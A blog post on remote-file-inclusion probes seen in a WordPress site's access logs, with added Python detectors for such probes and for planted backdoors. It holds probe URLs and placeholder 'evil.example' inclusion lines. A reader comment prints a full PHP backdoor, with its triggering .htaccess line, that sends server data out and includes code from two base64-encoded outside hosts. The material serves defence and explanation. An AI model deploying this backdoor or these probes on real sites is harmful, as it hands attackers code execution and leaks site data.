Anatomy Of An Attack

In an effort to remove all invalid links and redirections from my site I’ve been paying very close attention to my access logs. Courtesy of the list that Redirection maintains, I’ve noticed that my site has been under a prolonged attack.

No, there’s no panic just yet, and so far this is not something I’m worried about. The attacks appear to be part of a general ‘find any weakness in any website’ method, rather than a specific and directed attack. Let me give some details of the URLs that are being accessed:

/plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=someURL

/wp-content/plugins/myflash/myflash-button.php?wpPATH=someURL

/wp-content/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=someURL

/wp-content/plugins/Enigma2.php?boarddir=someURL

There are a couple of things wrong with these. The first is that the directory paths are all wrong: they assume my site is a default installation of WordPress, or even Movable Type, which it isn’t. The second is that they are trying to access plugins I don’t have. This tells me the attacks are just scanning for a weakness, rather than specifically targeting my site.

Looking at the attacks in more detail, we can see that all of them call some PHP script and pass it a parameter that points to a remote site. Research into these plugins shows that they have all been identified as insecure. What is happening is that the attacker is exploiting a flaw in the plugin and forcing it to load a script from an external website. That script is then executed by your own web server, giving the attacker the keys to your kingdom and allowing them to easily compromise your site. Nasty.

Fortunately none of the remote sites work, and the scripts are all unavailable. Unfortunately it doesn’t take much effort to locate sites where these scripts are available.

The moral of this story is twofold. Most importantly it is to always keep up-to-date with software (including plugins). Second is to keep an eye on your logs and be aware of what’s going on. This won’t give you any more protection, but as the proverb goes ‘forewarned is forearmed’.
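Spotting this kind of probe in a log is mechanical once you know the signature: a query parameter whose value is itself an absolute URL. The following is an added example for this post, not code from the article or from the Redirection plugin; it parses combined-format access log lines and reports every request that passes a remote URL as a parameter, distinguishing 404 probes against paths that don’t exist from 2xx answers that would need urgent investigation. SAMPLE_LOG is constructed: the probed paths mirror the ones quoted above, while the client addresses, timestamps and the host ‘evil.example’ are placeholders. The `allow_params` argument exists because a site may legitimately carry URLs in some parameters (a redirect endpoint, say), and those would otherwise show up as false positives.

```python
"""Flag remote-file-inclusion (RFI) probes in combined-format web access logs.

Added example for this post; it is not code from the original article or from
the Redirection plugin. SAMPLE_LOG is constructed: the probed paths mirror the
ones quoted in the post, while client addresses, timestamps and the remote host
'evil.example' are placeholders.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format:
# host ident user [time] "METHOD target PROTOCOL" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself an absolute URL is the RFI signature:
# the vulnerable script is being told where to fetch code from.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (placeholders throughout; see module docstring).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2008:13:55:36 +0000] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=http://evil.example/x.txt? HTTP/1.0" 404 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Oct/2008:13:55:37 +0000] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://evil.example/x.txt? HTTP/1.0" 404 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [10/Oct/2008:14:01:02 +0000] "GET /wp-content/plugins/Enigma2.php?boarddir=ftp://evil.example/x HTTP/1.1" 404 512 "-" "Mozilla/4.0"
192.0.2.44 - - [10/Oct/2008:14:02:10 +0000] "GET /2008/10/anatomy-of-an-attack/?replytocom=12 HTTP/1.1" 200 8123 "http://www.google.com/" "Mozilla/5.0"
192.0.2.45 - - [10/Oct/2008:14:03:00 +0000] "GET /go/?url=http%3A%2F%2Fexample.org%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
this line is not in combined format and is skipped
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def remote_url_params(target):
    """Return the request path and the (name, value) pairs whose value is a remote URL."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes both names and values, so %5b/%5d become [ ].
    hits = [(name, value) for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if REMOTE_SCHEME_RE.match(value.strip())]
    return parts.path, hits


def find_rfi_probes(log_text, allow_params=frozenset()):
    """One finding per (request, parameter) whose value points at a remote host.

    allow_params names parameters that legitimately carry URLs on this site
    (for example a redirect endpoint) so they are not reported. A 2xx answer to
    such a request means the script exists and responded, which needs looking
    into; a 404 is a probe against a path that is not there.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, hits = remote_url_params(rec["target"])
        for name, value in hits:
            if name in allow_params:
                continue
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "path": path,
                "param": name,
                "remote": value,
                "status": rec["status"],
                "severity": "hit" if 200 <= rec["status"] < 300 else "probe",
            })
    return findings


def summarize(findings):
    """Count findings per source address and per probed path."""
    return {
        "by_ip": Counter(f["ip"] for f in findings),
        "by_path": Counter(f["path"] for f in findings),
    }


if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG, allow_params={"url"}):
        print(f"{f['severity']:5} {f['ip']:15} {f['status']} {f['path']} {f['param']}={f['remote']}")
```

Run against a real log, the `by_path` counter tells you which plugins the scanners currently believe are worth probing, and `by_ip` shows whether one source is walking a list (as the two consecutive requests from the same address do in the sample) or many sources are trying one path each.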

4 comments

  1. Have you seen Alex King’s 404 Notifier? Kind of handy for keeping track of the weird URLs that are feeding into your site. Though it does tend to fill up with 404s from comment-XXXX from Akismet-blocked spam.

  2. Oops sorry I didn’t notice your own plugin tracks 404s and does additional handy stuff. Need to click through the links before commenting.

  3. I just discovered that one theme I’ve used generated some weird .htaccess files in my sub-dirs, which redirected the 404 page to an included script, which passed a bunch of my server variables to 2 URLs as query strings. If this was aimed at usage statistics, it is not a fine way to do it, without asking the owner first.

    this is the .htaccess found on various paths:
    Options -MultiViews
    ErrorDocument 404 //wp-content/themes/194773.php

    and this is the called script, which passes my data to 2 base64-encoded URLs. Aren’t there many base64 decoders available online? Do they think they are the only smart-asses? How lame!

    <?php
    // Fail silently: no errors reach the page or the log
    error_reporting(0);
    $s = "e";
    // Collect request and server details, falling back to the old register_globals names
    $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
    // Base64-encode each value and join them with "." into one query string
    // (".$s." interpolates to ".e.", a marker between the REMOTE_ADDR and SCRIPT_FILENAME fields)
    $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." .
           base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." .
           base64_encode($g) . "." . base64_encode($h) . ".$s." . base64_encode($i) . "." . base64_encode($j);
    // Remote include: "aHR0cDovLw==" decodes to "http://", "d3d3My5yc3NuZXdzLndz" to "www3.rssnews.ws"
    // and "d3d3My54bWxkYXRhLmluZm8=" to "www3.xmldata.info". Whatever the first host returns is
    // executed on this server; the second host is tried if the first include fails.
    if ((include(base64_decode("aHR0cDovLw==") . base64_decode("d3d3My5yc3NuZXdzLndz") . "/?" . $str))) {
    } else {
        include(base64_decode("aHR0cDovLw==") . base64_decode("d3d3My54bWxkYXRhLmluZm8=") . "/?" . $str);
    }

  4. I agree that I wouldn’t be too happy with that information being sent somewhere. It’s not difficult to provide it as an option, or to even include it in a disclaimer.
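The two artefacts described in comment 3, a theme-dropped .htaccess that routes 404s to a PHP file and a script that include()s a base64-decoded URL, are both easy to sweep for on disk. Below is an added example for this post, not code from the article, the commenter or any theme: it walks a wp-content tree, flags ErrorDocument directives whose handler is a PHP script, flags PHP files that pass a base64_decode() result straight to include or require, and decodes the base64 literals in such files so you can see the host they talk to. The directory tree is built in a temporary directory from constructed files; the ErrorDocument line copies the one quoted in comment 3, and the encoded hostname is the constructed placeholder ‘phone-home.invalid’.

```python
"""Sweep a wp-content tree for a 404 handler pointed at a PHP script and for
PHP files that include() a base64-decoded URL.

Added example for this post; it is not code from the article, the commenter or
any theme. build_sample_tree() writes constructed files into a temp dir: the
ErrorDocument line copies the one quoted in comment 3, the encoded host is the
placeholder 'phone-home.invalid'.
"""
import base64
import os
import re
import tempfile

ERRORDOC_RE = re.compile(r'^\s*ErrorDocument\s+(\d{3})\s+(\S+)', re.MULTILINE)
# include/require whose argument starts with base64_decode(...): a decoded
# string being handed straight to the include mechanism.
REMOTE_INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\s*\(', re.IGNORECASE)
B64_LITERAL_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/]+={0,2})["\']\s*\)')


def decode_literals(src):
    """Decode every base64 string literal fed to base64_decode(); skip non-text blobs."""
    decoded = []
    for lit in B64_LITERAL_RE.findall(src):
        try:
            decoded.append(base64.b64decode(lit, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def check_htaccess(relpath, text):
    """Flag ErrorDocument directives whose handler is a PHP script.

    WordPress serves its own 404 page through the rewrite rules, so a theme or
    plugin directory that routes 404s to a .php file deserves a look."""
    findings = []
    for status, handler in ERRORDOC_RE.findall(text):
        if handler.split("?", 1)[0].lower().endswith(".php"):
            findings.append({"file": relpath, "kind": "errordocument-php-handler",
                             "detail": f"{status} -> {handler}"})
    return findings


def check_php(relpath, text):
    """Flag include/require of a base64-decoded value and report what the literals decode to."""
    if not REMOTE_INCLUDE_RE.search(text):
        return []
    return [{"file": relpath, "kind": "include-base64-url", "detail": decode_literals(text)}]


def sweep(root):
    """Walk root, applying the .htaccess check and the PHP check; results sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                findings.extend(check_htaccess(rel, text))
            elif name.lower().endswith(".php"):
                findings.extend(check_php(rel, text))
    return sorted(findings, key=lambda f: f["file"])


def build_sample_tree(root):
    """Constructed sample tree: a benign .htaccess, a benign theme file, and the two artefacts."""
    host_b64 = base64.b64encode(b"phone-home.invalid").decode("ascii")  # placeholder host
    files = {
        "wp-content/uploads/.htaccess": "Options -Indexes\nErrorDocument 404 /404.html\n",
        "wp-content/themes/sometheme/functions.php":
            "<?php\nfunction sometheme_setup() { add_theme_support('menus'); }\n",
        "wp-content/themes/sometheme/.htaccess":
            "Options -MultiViews\nErrorDocument 404 //wp-content/themes/194773.php\n",
        "wp-content/themes/194773.php":
            '<?php\nerror_reporting(0);\n$str = base64_encode($_SERVER["HTTP_HOST"]);\n'
            'if ((include(base64_decode("aHR0cDovLw==").base64_decode("' + host_b64 +
            '")."/?".$str))) {} else {}\n',
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the sample tree, sweep it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return sweep(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['kind']:26} {f['file']}: {f['detail']}")
```

Point `sweep()` at a real wp-content directory to use it for the site itself; the benign uploads .htaccess and the ordinary functions.php in the sample are there to show that plain ErrorDocument use and ordinary theme code are not reported.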
